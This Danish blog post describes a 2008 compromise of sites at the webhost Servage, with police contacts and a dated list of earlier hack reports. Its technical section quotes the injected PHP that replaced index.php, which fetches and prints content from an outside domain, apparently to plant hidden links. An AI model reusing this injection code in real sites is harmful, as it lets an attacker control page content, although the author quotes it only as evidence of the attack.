Så er vi kommet noget videre i sagen. Frank som har skrevet en kommentar spottede meget sent i nat, at vi begge bruger Servage som webhost og det var faktisk bare det stikord der skulle til. Efter en del googling og analysering af filer på mine sites, så er der nu ingen tvivl om, at jeg er blevet hacked (det samme gælder for Frank). Well, faktisk er det ikke 100% sikkert, at det er os der er blevet hacked – det er mere sandsynligt at det er selve serveren, hvor vi har vores domæner liggende.
Logger man ind i Servage kontrolpanel, så kan man ikke selv se sit indtastede kortnummer (kun de fire sidste cifre), så det er ikke den vej hackerne har fået adgang. Det bestyrke også mistanken om, at det er selve serveren der er blevet hacked og at "de" derfor har haft adgang til meget mere følsom data.
Ydermere så har Servage forbedret deres sikkerhed, ved dels at have ændret reglerne omkring passwords og dels ved at have installeret et såkaldt CAPTCHA-system d. 21. juni 2008. Begge forbedringer er sket relativt kort efter, at der har været meldinger om, at Servage igen er blevet hacked. 
En anden "sjov" ting er, at jeg ringede til politiet (Station Amager) for at høre noget omkring en anmeldelse af det hele (vel at mærke før jeg vidst, at der var tale om Servage). Personen jeg talte med kunne ikke lige umiddelbart fortælle om det var noget jeg kunne anmelde eller om det var noget som skulle ske gennem banken. Han ringede derfor tilbage lidt senere og fortalte, at såfremt jeg ikke fysisk havde mistet mit kort, så var det ikke noget jeg kunne anmelde. Så det er op til min bank/PBS at gå videre den vej, hvis de vil det.
Frank har også ringet til politiet (Station City) og her fik de at vide, at det da helt klart kan (og skal) anmeldes – længere er den sag ikke.
Såeh… Er der virkelig så meget forskel i uddannelsen af Danmarks politi på Amager og på Halmtorvet?
En lille liste over hvad jeg lige umiddelbart kunne finde omkring dette:
15. februar 2008: Ændrede filer på Servage
7. marts 2008: Servage hacked: Exploit-Iframe (Trojan) Infection
26. marts 2008: Today I ended my Servage problems
18. maj 2008: Servage got hacked again
30. maj 2008: GoodBye Servage!
21. juni 2008: Servage angrebet – tjek dine index.php filer
Var der nogen der sagde ny webhost? 
Følgende indhold er mere teknisk og viser blot hvad der kendertegner det der er sket.
Mine index.php-filer er blevet ændret på to måder. Den ene er en total erstatnig af filen til:
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?767");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?767")); }
if($r) print $r;
… som henter nedenstående information:
Heldigvis havde det site hvor ovenstående index.php-fil blev lavet også en default.php-fil, som indeholdte den rigtige startside. Der er med andre ord ikke gået noget kode tabt.
Den anden er en tilføjelse af links til den eksisterende index.php-fil:
Listen er kortet betydeligt ned og linksne variere fra index.php-fil til index.php-fil.
I begge tilfælde er det relativt harmløst – faktisk er der blot indsat nogle links, som andre person ikke engang kan se. Spørgsmålet er bare, hvad har de ellers fået fat i følsomme data? Egentlig behøver der ikke være tale om en og samme person! Som der åbenbart ser ud, så er Servage hullet som en si, så det er jo nærmest gud og hver mand, der kan skaffe sig adgang til serverne. 
Recent Comments